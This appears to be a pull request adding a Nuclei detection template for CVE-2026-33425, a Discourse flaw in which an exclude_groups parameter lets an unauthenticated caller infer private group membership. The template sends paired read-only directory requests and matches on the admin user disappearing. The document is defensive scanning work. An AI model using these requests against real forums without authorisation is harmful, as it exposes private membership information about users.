### PR TITLE
Add CVE-2026-33425 template

### DIFF
--- a/http/cves/2026/CVE-2026-33425.yaml
+++ b/http/cves/2026/CVE-2026-33425.yaml
@@ -1,0 +1,48 @@
+id: CVE-2026-33425
+
+info:
+  name: Discourse - Private Group Membership Inference via exclude_groups
+  author: str4k3r
+  severity: medium
+  description: |
+    Discourse's directory endpoint resolves the caller-supplied
+    exclude_groups names to group IDs without checking whether the anonymous
+    caller may see the group or its members. An unauthenticated request can
+    therefore remove members of a private group from the directory response,
+    allowing private group membership or group existence to be inferred. The
+    fix filters excluded groups through both visibility checks before applying
+    the exclusion.
+  impact: An unauthenticated attacker can infer whether users belong to a private Discourse group.
+  remediation: Upgrade Discourse to 2026.1.2, 2026.2.1, or 2026.3.0-latest.1 or later, or disable public user-directory access.
+  reference:
+    - https://github.com/discourse/discourse/security/advisories/GHSA-r6rh-xvf5-r5f2
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-33425
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 6.9
+    cve-id: CVE-2026-33425
+    cwe-id: CWE-203
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: discourse
+    product: discourse
+  tags: cve,cve2026,discourse,info-disclosure,unauth
+
+http:
+  - raw:
+      - |
+        GET /directory_items.json?period=all&order=likes_received&page=0 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /directory_items.json?period=all&order=likes_received&page=0&exclude_groups=admins HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"
+          - "status_code_2 == 200"
+          - "body_1 != body_2"
+        condition: and

--- a/http/cves/2026/CVE-2026-33425.yaml
+++ b/http/cves/2026/CVE-2026-33425.yaml
@@ -39,10 +39,22 @@ http:
         GET /directory_items.json?period=all&order=likes_received&page=0&exclude_groups=admins HTTP/1.1
         Host: {{Hostname}}
 
+    matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - "status_code_1 == 200"
-          - "status_code_2 == 200"
-          - "body_1 != body_2"
-        condition: and
+      - type: status
+        part: status_code_1
+        status:
+          - 200
+      - type: status
+        part: status_code_2
+        status:
+          - 200
+      - type: word
+        part: body_1
+        words:
+          - '"username":"admin"'
+      - type: word
+        part: body_2
+        words:
+          - '"username":"admin"'
+        negative: true


### PR DESCRIPTION
## Description

This template detects CVE-2026-33425, an unauthenticated Discourse information disclosure that allows private group membership to be inferred through the `exclude_groups` directory parameter.

## Detection logic

- Requests the public directory normally.
- Repeats the same read-only request with `exclude_groups=admins`.
- Reports the issue only when both responses are successful, the baseline contains the built-in `admin` directory user, and the excluded response no longer contains that user. This directly tests whether the private `admins` group exclusion was applied to the anonymous request.

The probe uses the built-in `admins` group and does not create, modify, or delete users, groups, or directory data. Targets without a public directory or without the stock `admin` directory entry are intentionally not reported.

## References

- https://github.com/discourse/discourse/security/advisories/GHSA-r6rh-xvf5-r5f2
- https://github.com/discourse/discourse/commit/b15e917278679ff43e534baaad9172bde976160f
- https://nvd.nist.gov/vuln/detail/CVE-2026-33425

## Validation

- Native Nuclei validation: passed
- Vulnerable Discourse 2026.1.1: detected 3/3
- Fixed Discourse 2026.1.2: not detected 3/3